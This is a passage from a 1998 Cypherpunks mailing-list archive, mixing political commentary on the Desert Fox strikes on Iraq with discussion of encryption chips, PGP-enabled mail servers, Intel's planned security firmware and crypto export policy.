Radio2: "Omega One, you are clear for drop."

(weapons fly, killing a few thousand innocent men, women, and children.)

It amazes me how much similarity Babylon 5 has to reality. Is Clinton a fan
who fancies himself as President Clark? I'm starting to worry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel Popescu" <mdpopescu@geocities.com>
Date: Fri, 18 Dec 1998 08:36:48 +0800
To: "Cypherpunks list" <cypherpunks@toad.com>
Subject: RE: I must admit. . .
In-Reply-To: <Pine.LNX.3.96.981217220848.32327E-100000@zor.hut.fi>
Message-ID: <000301be2a14$9e5a8ec0$22fcb3c3@roknet.ro>
MIME-Version: 1.0
Content-Type: text/plain



> I for one would like sendmail integrated with PGP. For example:
> sendmail asks receiving server if it has PGP, and please give 
> your public key, I have mail for you.. Then send the e-mail 
> encrypted, while the receiving sendmail decrypts it and delivers
> forwards. This is not very effective, but it would help some.

I think this is a great idea. First time I'll play with making a POP client (an idea that appeals to me once in a while) I'll think about it...

Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 18 Dec 1998 10:43:46 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Comrade Klinton at it again
Message-ID: <94b152b25895bf0f093f3a7186ddfaef@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Don't you mean "Iraqui" Embassy?
>
>Or is this thing spreading? I hope not.
>
>Comrade Klinton is no worse than Comrades Hyde, Ingliss, Gingrich,
>Coble, Bono, well you know the rest. They all call themselves statesmen
>but they are pretty damned pedestrian.

An NBC reporter in Baghdad reported that the Iranian embassy was hit by a
Tomahawk, but I've had the news off since then and haven't heard anything
else about it. The Klinton White House won't come out and admit that they
missed, just like they won't admit that a Tomahawk landed in someone's
house last night (again according to NBC).

You are wrong, though. Comrade Klinton is worse than Comrade Hyde and the
rest. The loyal card-carrying Party members in congress are limited in power
because the majority of them have to agree on an issue. Comrade Klinton can
do virtually whatever he wants with the military under the War Powers Act
and doesn't have to answer for it until it's all over.

As I recall, the name "Desert Fox" was a nickname held by a Nazi general.
Fitting, that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vortexia <vortexia@doxx.net>
Date: Fri, 18 Dec 1998 10:27:05 +0800
To: cypherpunks@Algebra.COM
Subject: Encryption chip
Message-ID: <000801be2a26$05fad100$973402c4@vort.nis.za>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know if there is some kind of chip, or IC commercially available
that does secure encryption?

Thanx

Andrew Alston




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Fri, 18 Dec 1998 18:23:41 +0800
To: vortexia@doxx.net>
Subject: RE: Encryption chip
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8645@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Does anyone know if there is some kind of chip,
>  or IC commercially available that does secure encryption?

Yes, somebody does know.

OK, sorry, that was facetious. In fact I know.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vortexia <vortexia@doxx.net>
Date: Fri, 18 Dec 1998 11:06:28 +0800
To: cypherpunks@Algebra.COM
Subject: Encryption Chip (details)
Message-ID: <002f01be2a30$4339a280$973402c4@vort.nis.za>
MIME-Version: 1.0
Content-Type: text/plain



Sorry to follow up my own post, but it was brought to my attention that
there are a number of encryption chips available and I would need to be more
specific to get any specific information.

I am looking for a chip that can do DES, Triple DES and/or Blowfish for the
purpose of secure communications.  We want an IC instead of software because
of the volume of information that will have to be processed in this project.

If anyone has any information please drop me an email

Thanks

Andrew Alston





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Fri, 18 Dec 1998 19:38:00 +0800
To: "'cypherpunks@EINSTEIN.ssz.com>
Subject: War as a public relations excercise (was re:Comrade Klinton at it again)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8646@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> nobody@sind.hyperreal.art.pl is accused of writing:
> 
>  As I recall, the name "Desert Fox" was a nickname 
> held by a Nazi general. Fitting, that.

It's what Allied journalists called Erwin Rommel, who was a German general,
if not exactly a Nazi. Sometimes said to be a military genius.   IIRC he
distinguished himself well as a Panzer commander under Guderian in the
attack on France;  commanded the Afrika Korps &  was beaten by the Allies
(doing his reputation little harm - they were strongly outnumbered and
probably lasted longer than they were expected to); and then was injured in
the D-day invasion, invalided out and accused of plotting to kill Hitler. He
was murdered  by the Nazis (in that he was told that if he commited suicide
his wife and children would not be sent to a concentration camp, which
counts as murder in my book).

Once upon a time a code name for a military "operation" was just that, a
code name. These days it is a brand label. Probably thought up by the same
guys that Coca-Cola or Ford would hire to name a new product.

For any British person over the age of about 30 "Desert Fox" will
immediately bring to mind Rommel, WW2 and the "Desert Rats",  the British
8th Army  (in fact mostly Indian + Australian with contingents from all over
the Empire) who fought against Rommel in North Africa. That reminds us of
the long-range Desert Group & for those who have been paying attention, the
SAS, (who get *heaps* of publicity here. There is a whole tacky genre of SAS
books and magazines) which in turn is supposed to make us feel good (all
that rhetoric about "punching above our weight" and the "best trained and
most skilled army in the world", "the Professionals").   

And "Fox" brings to mind foxhunting of course.  The choice of name is meant
to imply to British audiences that "our boys" are out there hunting Saddam,
even though that has been officially denied by both UK and US government.
All the publicity refers to "him" and "his" weapons.  No-one ever says "we
are at war with Iraq", it is always "we are denying *him* the  use of *his*
weapons of mass destruction".  Maybe we will soon  start to see planted
media hints that there are, or have been,  SAS  on the ground in Iraq
looking for *him* - which will be instantly denied in such away as to allow
people to carry on  thinking that it is true if they want to. The US may
have a law against killing heads of state but we Brits don't (although
apparently we are still unsure as to whether we have a law against
extraditing them to Spain when accused of a mere 3,000 murders).  

I strongly suspect the news management for this war was handled by the
Brits, possibly the same spin team that handled last years Labour general
election victory.    

The first attack was about 4 minutes to 10 pm UK time.  I heard it as a
newsflash on the radio & then turned on the TV just in time for ITV's "News
at Ten" program.  One of their journalists was waiting outside that front
door of 10 Downing Street, obviously tipped off about an "important
announcement" and the PM came out sometime around 10 past 10 to make his
speech (half an hour *before* Clinton, which must have been agreed between
the governments) which ended just in time for the ad break.

I suppose Clinton's speech would have been about lunchtime on the West
Coast, late afternoon on the East Coast. A bit early from the POV of news
management. It gives the networks a few hours to work on it before
prime-time TV.  One of the first rules of this sort of thing you want  your
own words  to go over unedited if at all possible - the less time the
networks get the more likely you are just to be given a live mike. That way
you get to choose your own sound-bites.  Or borrow them from  Margaret
"There is No Alternative" Thatcher. Of course she needed the Falklands War
to get re-elected, and Clinton needs all the help he can get, but Blair is
still master of all he surveys (Well, except for a few of us unreconstructed
far-lefties, Peter Mandelson's private life,  and Welsh Labour Party) so
perhaps he can afford to be magnanimous in victory. Or perhaps he really
thinks that there is no alternative.

We could accuse them or timing the attack for  TV, although I suspect 0100
Baghdad time was in fact a sensible H-hour. You'd want it after dark,  and
later rather than earlier if you were interested in minimising civilian
casualties.   I suppose 0300 or 0400 might have been better - but that would
have missed UK evening TV and given the news media time to sort out their
story for the morning (some of the "serious"  papers here came out against
the attack. Tabloids seem to be all for it of course).  As it was everyone
got the  government announcement first. 

Ken Brown

This all my opinion and nothing to do with my employers. (And I am
certainly not even going to speculate about oil prices from this address).








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Dec 1998 13:16:19 +0800
To: cypherpunks@Algebra.COM
Subject: .....
Message-ID: <199812180438.FAA15935@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



 * Intel's new chipset -> death of open source security?
 [ http://www.techweb.com/wire/story/TWB19981214S0008 ]

 * "[T]he Clinton administration announced further relaxation of U.S. export
 limits on encryption technologies."
 [ Mobile Computing and Communications (Jan. 99 issue, pp. 26+) ]

-------------------------------------------------------------------------------
Intel plans to include security features in upcoming chipsets, including copy
protection, certificate management, and -- get this -- random number
generation. This will be implemented in firmware, and, given that it is
supposed to perform copy protection functions, there is a significant
possibility that the code would be inaccessible, maybe (heaven forbid) within a
tamper-resistant shell.

Suggested response: Make negative noise about it -- of course -- and, upon the
release of the specs, write software which interoperates with it, allowing
software written to use the chips to use open-source routines. In the best
case, you would be able to correct everything but the copy protection; in the
worst case, software-inaccessible key material would be necessary to
impersonate any function of the security chips -- possibly for the stated
purpose of preventing hostile code from overriding the security functions --
and it's necessary to either get trusted keys out of the chip or patch the
chip-using software, assuming that isn't made impossible, too.

Although I have no idea how one would go about lobbying Intel to make a
software-extensible design, it would be a Good Thing if they allowed a
mechanism for software to override the chip without risking losing the security
to a virus. It could be as simple as tweaking the relevant specs so that
developers would "naturally" make a program which would use a non-Intel-trusted
software fill-in for security functions when one is available, but know that
software was being used and who has signed it. That is, the protocols not only
make it possible for software to fill in for hardware but let programs that
work with the hardware work with the software fill-ins without modification.
Wouldn't affect the (deeply misguided) copy protection features, because
software seeking copy protection could refuse to accept an answer that wasn't
authenticated as being from the trusted hardware.
-------------------------------------------------------------------------------
Pretty much self-explanatory: those opposing crypto regs present examples
demonstrating why crypto should be deregulated; the examples are deregulated
and the point is ignored. Far too many people are complacent.

A specific example: Mobile Computing and Communications (Jan. 99 issue, pp.
26+). It's an article saying that the Clinton administration has loosened
regulations and, denying those who oppose the administration's position the
fair shake given to even the most patently useless palmtop, states in the fifth
sentence that "[t]he main issues are privacy and security, and with this policy
it seems a delicate balance has been met."

The same magazine (in fact, the same author in the same issue) referenced
single-DES as "advanced encryption" with no mention of the fact that it had
repeatedly been broken or that most cryptographers agreed that use of DES was
to be avoided.

Rather than simply whine or rant about it, I suggest that at least some attempt
to respond be made. A letter to the editor may seem like a trite way to respond
to these non-crypto-savvy articles, but unless there are plans to hold
demonstrations outside the offices or just ignore it all...

[Begin sample letter to MC&C] 
A recent report in Mobile Computing and Communications applauded the Clinton
administration's loosening of cryptography when used in electronic commerce and
certain other applications. I loved the article, but it gave little attention
to what is probably, in the long term, the more important facet of
cryptography: everything else -- that is, the applications of cryptography that
are still regulated. Because intelligence agencies and some law enforcement
organizations are afraid that unregulated cryptography will lead to a
privacy-powered wave of terror, most of the vast potential of this technology
is being squandered. For example, a worldwide network of computers running
"anonymous remailer" software (which is powered by strong cryptography) could
use mathematics to provide something which lawyers and legislators have worked
to provide for hundreds of years: a virtual guarantee of freedom of speech. The
construction of such a network, though, is adversely affected by the controls
placed on the cryptographic software involved.

It's obvious that this particular application is not highly relevant to
businesses, but it's equally obvious to any professional cryptographer that
there is a myriad of other potential applications -- for companies and
individuals -- using software and hardware that is restricted by the current
set of regulations.

But the solution is not to follow the current trend, which has been to loosen
regulations where there are complaints -- first banking, then medicine and
insurance, and maybe anonymity in the future -- while tightening them in other
fields through political maneuvers such as the Wassenar Arrangement. The
solution I support, and the one supported by many others inside and outside the
field of cryptography, is to keep our fears about cryptography reined in by our
hopes for it, and to deregulate it so that this growing technology's full
potential can be realised.
[End sample letter to MC&C]
-------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Dec 1998 13:54:33 +0800
To: cypherpunks@Algebra.COM
Subject: Re: .....
Message-ID: <199812180521.GAA19817@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Intel plans to include security features in upcoming chipsets, including copy
> protection, certificate management, and -- get this -- random number
> generation. This will be implemented in firmware, and, given that it is
> supposed to perform copy protection functions, there is a significant
> possibility that the code would be inaccessible, maybe (heaven forbid) within a
> tamper-resistant shell.

To clarify exactly why this is a problem: although it obviously won't affect
the security of existing apps, it's likely that many newer apps will be
dependent on this possibly-secret firmware for security, and we all know the
evils of depending on a design not subject to intense public scrutiny. Worse
yet, it seems possible that a certificate-based system could be used to ensure
that neither non-Intel chips nor software fill-ins would be accepted by
applications using the firmware.

And, of course, except for what was mentioned in the TechWeb article itself,
this is all conjecture based almost entirely on Murphy's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Dec 1998 21:46:46 +0800
To: mac-crypto@vmeng.com
Subject: international free crypto campaign
Message-ID: <v04020a44b2a002ece47e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Erich Moechel" <erich-moechel@quintessenz.at>
To: rms@gnu.org
Date: Fri, 18 Dec 1998 11:55:26 +0100
Subject: international free crypto campaign
CC: rah@shipwright.com
Priority: normal
Status: U

Hello,
We are in the midst of developing logos 4 the global campaign
proposed as followup 2 the Wassenaar decision.
The logos are here:

http://www.quintessenz.at/freecrypto.html

We would appreciate ur evaluation, suggestions highly welcome.

quintessenz group is a founding member of the Global Internet
Liberty Campaign. I've done much on the spot reporting from
Wassenaar Office here in Vienna and am one of the coordinators of
the International Crypto Campaign.
hoping 2 hear from u
Erich

-.-.- --.-  -.-.- --.-  -.-.- --.-
     q/depesche taeglich ueber
internationale hacks--.-zensur im netz
crypto--.-IT mergers--.-monopole
& die universalitaet digitaler dummheit
subscribe http://www.quintessenz.at
-.-.- --.-  -.-.- --.-  -.-.- --.-
Certified PGP key http://keyserver.ad.or.at
-.-.- --.-  -.-.- --.-  -.-.- --.-
erich-moechel.com/munications
++43 2266 687201 fon  ++43 2266 687204 fax
-.-.- --.-  -.-.- --.-  -.-.- --.-

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wilson, Jamie (J.R.)" <jwilso37@visteonet.com>
Date: Fri, 18 Dec 1998 21:46:54 +0800
To: "'John Holland'" <cypherpunks@toad.com>
Subject: RE: McAfee PGP 6.0.2
Message-ID: <199812181306.IAA01466@mailfw1.ford.com>
MIME-Version: 1.0
Content-Type: text/plain



I downloaded my copy from
http://www.nai.com/products/security/pgp_perspriv602.asp.

____________________________________________________
Jamie R. Wilson                     


-----Original Message-----
From: John Holland [mailto:ekkensj@earthlink.net]
Sent: Thursday, 17 December, 1998 18:44
To: cypherpunks@toad.com
Subject: Re: McAfee PGP 6.0.2


>McAfee has announced that they are giving away the commercial version of
PGP 6.0.2 for free for a limited time.

Where is the free version available?  Neither the McAfee or Network
Associates web sites mentioned this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Dec 1998 22:35:18 +0800
To: cypherpunks@cyberpass.net
Subject: Dec. 18 column - Clinton still lying
Message-ID: <v04020a46b2a005787df0@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 17 Dec 1998 20:49:17 -0700
Date: Thu, 17 Dec 1998 19:52:00 -0800 (PST)
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Dec. 18 column - Clinton still lying
Resent-From: vinsends@ezlink.com
Resent-Sender: vinsends-request@ezlink.com
Status: U


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED DEC. 18, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    There, he did it again

    So again, American missiles and planes are committed to a half-hearted,
just-to-make-a-point "war" in Iraq. (Does no one else recall that a
longer-haired Bill Clinton once protested a war in Vietnam because it was
not legally declared, and further because it was unwinnable, given that
Lyndon Johnson's policy of gradual escalation and "measured response"
turned out to be good for nothing but filling body bags?)

  And so the vast majority of Americans now shuffle into line, dispiritedly
rallying once again behind our fighting men and women, praying for their
safety.

  But Americans express this subdued support in spite of -- not because of
-- their faith that their current president would never lie.

  President Clinton will almost certainly be impeached by the House of
Representatives within days if not hours, for past lies and subversions of
justice aimed solely at protecting his own power, privilege and prestige.

 But surely matters of life and death, war and peace, are of such moment
that no president would subordinate them to any ongoing attempt to sidestep
justice ... right?

  In the final episode of the award-winning documentary series "The World
at War," a middle-aged German woman -- she had been a teen-ager in the
spring of 1945 -- recalls hiding in a Berlin basement as Russian shells
rained down overhead, listening with her mother to what was likely the
final radio broadcast by Nazi public relations chief Joseph Goebbels. When
Goebbels promised that the war would yet be won by secret weapons soon to
be unveiled by der Fuhrer, the teen-aged girl expressed disbelief. She was
then stunned when her mother slapped her, admonishing: "Do you think Herr
Goebbels would lie to us at a time like (start ital)this?(end ital)

  Mr. Clinton's crimes are on nowhere near the scale of those of the Nazis,
of course. (Though the relatives of the women and children his henchmen
killed at Waco might ask what difference the "scale" makes -- as now the
same question may occur to those dying in Iraq to prevent that sovereign
nation from stockpiling the same kinds of weapons the United States has
possessed for decades.)

  But isn't there a ghastly fastidiousness to the way this simpering
administration  insists it will not bomb during the Ramadan holiday so as
not to offend "Muslim sensibilities"? When George Patton's First Army was
racing to the relief of Bastogne, did the troops take a day off from
killing Germans on Dec. 25? If foreigners bombed your home and killed you
family, would you be less offended to have them do so on Dec. 22 than on
Christmas Day, or Yom Kippur?

  Do Mr. Clinton and his political advisors really understand what war
(start ital)is(end ital)?

  Meantime, the evidence mounts (it never seems to take long, anymore) that
Mr. Clinton did indeed lie again on Dec. 16, when he told the American
people that he decided on the timing of these latest bombings not to divert
attention from his own impending impeachment, but rather upon the specific
catalyst of receiving -- on Wednesday -- a final report from U.N. arms
inspectors.

  The Washington Times reported in a front page story Thursday that,
according to "authoritative sources," the White House notified the Joint
Chiefs of Staff that air strikes would be ordered this week on (start
ital)Sunday(end ital), "48 hours before he saw a United Nations report
declaring Iraq in noncompliance with weapons inspectors."

  Providing third-party corroboration, Israeli spokesman Aviv Bushinsky
said Wednesday that President Clinton discussed preparations for an attack
with Israeli Prime Minister Benjamin Netanyahu just minutes before Mr.
Clinton flew home from Israel on (start ital)Tuesday(end ital).

  What does it matter, which day the president made the decision? It
doesn't , of course; it only matters if the president deliberately lied
about it, which then throws into question anything else he has said about
the real motives for these actions.

  The Times further quotes a "senior congressional source" reporting that
"White House eagerness to launch air strikes grew with intensity as a
parade of centrist Republicans announced they would vote to impeach the
president."

  The credibility of the president (start ital)does(end ital) matter. The
ability of the public to have confidence that the man in the Oval Office
will put the faithful execution of his constitutional oath and duties ahead
of his personal ambition -- even his own political survival -- (start
ital)does(end ital) matter.

  Or are we willing to accept a world in which wars orchestrated by
television producers with the goal of improving "ratings points" turn out
not to be fiction, at all?

  (The second thing White House spokesmen did Dec. 16 -- after announcing
the latest raids on Iraq -- was to deny this was "a Wag the Dog scenario,"
referring to the reason cult comedy in which a hypothetical president
arranges a fake Balkan war to keep a sex scandal off the front pages.)

  For all his failings, can anyone imagine Franklin Roosevelt troubling
himself to deny that the D-Day landings of 1944 were staged as a mere
political stunt, to "make him look more presidential"?

  Mind you, I wish more Americans would start ridiculing the absurd
assumption that we need the federal government to hold our hands and change
our diapers, cradle to grave. The best remedy for the pretensions of many
of these arrogant bureaucrats to run our lives is indeed to laugh them out
of town.

  I just never expected to see the United States of America turned so
quickly into an impotent laughing stock, and from the top down.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com.

***


Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Fri, 18 Dec 1998 18:25:15 +0800
To: cypherpunks@toad.com
Subject: RE: I must admit. . .
Message-ID: <802566DE.0034A7C4.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



So maybe this needs a multi-phase approach.

1)The mail programs themselves will encrypt between servers.  This can be
used to both protect the message(s) from being read (easily).  Does PGP
also assist by doing some compression?.  Also it can be used to autheticate
messages using a signiture which will have the dual purpose of providing
some tamper proofing.

2)The receiving mail-server will autheticate the incoming message against
its own list of known servers, and validate that the contents of the
message as a whole appears OK.  Maybe it will flag messages that fail these
checks.  It can also flag messages that arrived without server encryption.

3)If the incoming decrypted message is not itself privately encrypted by
the sender it will use PGP to encrypt the message for the user before
storing locally.  If the sender has already encrypted the message then it
will simply store it.

Caveats

A)All systems must have compatible encryption systems or access to those
systems.  (Why limit to just one?) and all those systems must have some
sort of agreed means of flagging the message to allow automatted
decryption.

B)Some means of exchanging public keys must be developed.  This must allow
for keys to be changed.  What happens when keys are changed, and messages
are still in transit from the old keys.

C)Not everyone is wise enough to use UNIX.  Some people even use (pardon
the language) Windoze or even AS/400's.

There is plenty more scope for discussion here I think even if it is some
of the less verbally able slagging off about old ideas that can't/won't
work because ... etc.  Surely there are enough brains out there to thrash
this through properly.

Hwyl





"William H. Geiger III" <whgiii@openpgp.net> on 18/12/98 00:23:05

To:   "Marcel Popescu" <mdpopescu@geocities.com>
cc:   "Cypherpunks list" <cypherpunks@toad.com> (bcc: Richard
      Bragg/UK/SSA_EUROPE)
Subject:  RE: I must admit. . .




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In <000301be2a14$9e5a8ec0$22fcb3c3@roknet.ro>, on 12/18/98
   at 01:26 AM, "Marcel Popescu" <mdpopescu@geocities.com> said:

>> I for one would like sendmail integrated with PGP. For example:
>> sendmail asks receiving server if it has PGP, and please give
>> your public key, I have mail for you.. Then send the e-mail
>> encrypted, while the receiving sendmail decrypts it and delivers
>> forwards. This is not very effective, but it would help some.

>I think this is a great idea. First time I'll play with making a POP
>client (an idea that appeals to me once in a while) I'll think about
>it...

Wouldn't it be more efficient to use TLS or SSH as an encryption protocol
between the POP3d and the POP3 client? This could also be used for
sendmail<->sendmail transactions.

This still does not address local storage on the POP3d server. I am
looking to setting up procmail to automatically PGP encrypt incomming
messages and the forwarding them to a local account so even if the sender
does not have PGP once the message is received by the PGP mail forwarder
the messages will be PGP encrypted (I have had several people contact me
looking for solutions to ISP's snooping on their mail without relying on
the senders using PGP).



- --
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------

Tag-O-Matic: OS/2: Your brain.  Windows: Your brain on drugs.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i OS/2 for non-commercial use
Comment: Registered_User_E-Secure_v1.1b1_ES000000
Charset: cp850

wj8DBQE2eZOrlHpjA6A1ypsRAgVDAKCpsNkbUjYCe77XBFHXnQDjZveHIwCg81zI
UQM3ssGqYt/sQ+674XepePs=
=GLQh
-----END PGP SIGNATURE-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Dec 1998 00:33:00 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Crypto related... [/.]
Message-ID: <199812181600.KAA21672@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://slashdot.org/

>     RIAA's Encypted Music-Working with defense contractors? The Internet
>    Posted by Hemos on Friday December 18, @08:32AM
>    from the things-that-make-you-go-hmm dept.
>    Tom Holroyd passed along some interesting pieces of information from
>    Eric S Arnum's recent piece over at SonicNet. Many of you saw that the
>    RIAA has decided to lauch their Secure Digital Music Initiative
>    (SDMI). Well, that's not so interesting on it's own, but their choice
>    of company is. It's a subsidary of SAIC, a privately held company that
>    does work in secure defense commnuications. The company (SAIC) has
>    worked with the CIA, NSA, and Navy, amongst others. Click below for
>    the full story.
>    Read More...
>    (18 comments, 2554 bytes in body)

>     Wassenaar agreement not to apply to free software? Encryption Posted
>    by sengan on Thursday December 17, @04:53PM
>    from the eh? dept.
>    The Free Software Foundation states that the Wassenaar agreement does
>    not apply to free-software. It'd be nice to know why. Is this a
>    provision for research, or some sort of loophole? Link countesy of
>    Linux Today.
>    Read More...
>    (89 comments)


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Fri, 18 Dec 1998 10:07:58 +0800
To: John Holland <ekkensj@earthlink.net>
Subject: Re: McAfee PGP 6.0.2
In-Reply-To: <3.0.5.32.19981217154338.00939630@mail.earthlink.net>
Message-ID: <Pine.LNX.4.05.9812181007350.7783-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Dec 1998, John Holland wrote:
>>McAfee has announced that they are giving away the commercial version of
>PGP 6.0.2 for free for a limited time.
>
>Where is the free version available?  Neither the McAfee or Network
>Associates web sites mentioned this.

well since mcafee and NAI are the same freekin company, they do all say
it goto the pgp pages (easy link -> www.pgp.com) download PGP For personal
privacy, it is under that link.


www.pgpi.com has illegally exported copies aswell.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Dec 1998 00:34:39 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: NSA Org Chart
Message-ID: <199812181558.KAA27257@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to Defense Information and Electronics Report
we offer NSA's organizational chart, which was obtained
by DI&ER under the FOIA:

   http://jya.com/nsa-chart.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Dec 1998 04:05:58 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Digital Democracy [/.]
Message-ID: <199812181936.NAA22321@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://slashdot.org/features/98/12/18/1319204.shtml

>    Digital Democracy: An Idea Whose Time Has Come News Posted by JonKatz
>    on Friday December 18, @01:19PM
>    from the We-Really-Don't-Have-To-Take-It-Anymore dept.
>    As the Middle-Aged White Guys in Suits dig in in D.C. for what is
>    hopefully their last stand, the idea of Digital Democracy never looked
>    better. If it's a good idea (and it is) to empower individuals by
>    teaching them how to master their own technology via movements like OS
>    and free software, isn't it past time to use the technology of the Net
>    and the Web to reverse the flow of power, away from the entrenched and
>    increasingly lunatic journalists and politicians in Washington and
>    back to the individuals staring from a distance in shock and horror
>    and what they're seeing on their TV screens? Forget Wag the Dog.
>    Joseph Conrad, Oliver Stone, Francis Ford Coppla (maybe Fellini, too)
>    have seized the capitol. Only we can't leave the theater.
>    
>    
>    
>    Never mind the silly allusions to "Wag the Dog." Somehow, Joseph
>    Conrad, Oliver Stone and Francis Ford Coppola (maybe Fellini, too) got
>    together to take over the government and play out their own visions of
>    our political life. The American capitol is now the Heart of Darkness,
>    fusing the darkest and most paranoid visions of "JFK" with the
>    spectacularly represented lunacy of "Apocalypse Now."
>    
>    The movies have somehow become real life, but we can't leave the
>    theater and go home. The horror never ends. Whenever we turn on the
>    TV, they're all still there, shouting, posturing, spinning.
>    
>    More and more, it seems clear that they're never going to go away.
>    Each one will have to be dragged out kicking and screaming, the last
>    zealot in Congress, the last self-righteous reporter, the last
>    screaming pundit on cable.
>    
>    It's time to start thinking about Digital Democracy. We have to be
>    able to do better than them.
>    
>    If the goals of OS and the free software movement are, in part, the
>    free and democratic sharing of technology, why not stretch the notion
>    farther and put it into the context of our increasingly surreal, even
>    mad, political times?
>    
>    The natural extension of the booming OS and free software movements
>    are into politics and democracy, especially the radical new ways in
>    which digital democracy could once again empower individuals instead
>    of politicians and journalists, and reform the obviously broken and
>    outdated way in which we resolve political issues.
>    
>    America was founded as a Republic, not really as a representative
>    democracy. For one thing, Americans were scattered far from one
>    another and couldn't make their feelings known quickly. So elected
>    representatives were elected to gather and make decisions on their
>    behalf.
>    
>    The authors of the Constitution didn't have all that much regard for
>    the judgements of the average citizen, any more than their successors
>    seem to. The structure was tilted towards a deliberative, rather than
>    simply representative system so that educated and affluent landowners
>    could screen the passions of the rabble and have the final say.
>    
>    The early pundits and cyber-gurus of the Internet's first generation
>    spouted on quite a bit about the impact of networked computing on
>    democratic institutions like Congress and journalism. These
>    institutions, they predicted, would increasingly become ineffective
>    and irrelevant, swept away by the power of digital technology to
>    reverse the flow of power.
>    
>    This cyber-rhetoric seemed - was - heavy-handed, Utopian and
>    overblown. It evoked the table-thumping Marxists more than the
>    architects of a new, civil order. But this week, it looks more better
>    by the hour.
>    
>    If you take the OS idea and daydream about it for a bit - millions of
>    individuals taking control of their own technology and shaping the
>    information they access and share, doesn't this idea have even greater
>    application for politics? And could it possibly be more timely? If
